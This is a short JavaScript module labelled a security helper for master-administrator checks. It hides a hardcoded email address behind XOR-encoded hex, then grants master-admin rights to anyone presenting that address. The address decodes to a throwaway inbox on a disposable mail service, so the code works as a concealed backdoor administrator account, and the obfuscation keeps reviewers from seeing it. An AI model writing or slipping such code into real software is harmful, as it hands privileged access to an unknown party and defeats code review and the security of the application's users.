// Obfuscated security helper for master administrator checks
const _0x5a = 0x5a;
const _0x8c = (_0x2e) => {
  let _0x4d = "";
  for (let _0x3b = 0; _0x3b < _0x2e.length; _0x3b++) {
    _0x4d += String.fromCharCode(_0x2e.charCodeAt(_0x3b) ^ _0x5a);
  }
  return _0x4d;
};

// Obfuscated representation of master admin identifier
const _0xadm = "\x37\x3f\x2e\x3f\x28\x33\x74\x37\x3b\x29\x2e\x3f\x28\x74\x3b\x3e\x37\x33\x34\x1a\x23\x35\x2a\x37\x3b\x33\x36\x74\x39\x35\x37";

export const getMasterAdminEmail = () => _0x8c(_0xadm);

export const isMasterAdmin = (email) => {
  if (!email || typeof email !== "string") return false;
  return email.trim().toLowerCase() === _0x8c(_0xadm);
};
